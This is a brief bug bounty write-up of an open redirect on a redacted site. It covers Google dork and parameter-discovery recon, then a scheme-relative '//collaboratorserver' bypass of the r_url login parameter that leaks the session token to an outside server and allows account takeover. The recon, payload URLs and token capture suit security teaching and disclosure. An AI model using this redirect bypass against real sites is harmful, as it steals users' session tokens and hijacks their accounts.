This is a open redirect bug from a self hosted bug bounty program that was worth $200.
- Combine Google Dork methods to find a fresh target no one had touched until now. (Use reports on H1, Bugcrowd, etc)
- Crawl the website for 10 minutes.
- Tried to find the user registration function for the website but failed.
- Used Google Dork to find the register page:
site:redacted.com "register" OR "signup" OR "registration" - Successfully registered an account.
- Time to check for hidden parameters on the login page.
- Used HTTP parameter discovery tool such as
arjun,X8, andGAPto discoverr_urlparameter. - Tried Open Redirect to other server but it didn’t work. It only accepts their own domain:
https://redacted.com/user/login?r_url=https://collaboratorserver - ERROR - Can easily bypass this:
https://redacted.com/user/login?r_url=//collaboratorserver - OK - After successful login, the collaborator server receives HTTP hit with the token:
GET /?token=xxxxxxxxx HTTP/1.1 - Account Takeover by setting the token as the Cookie on browser.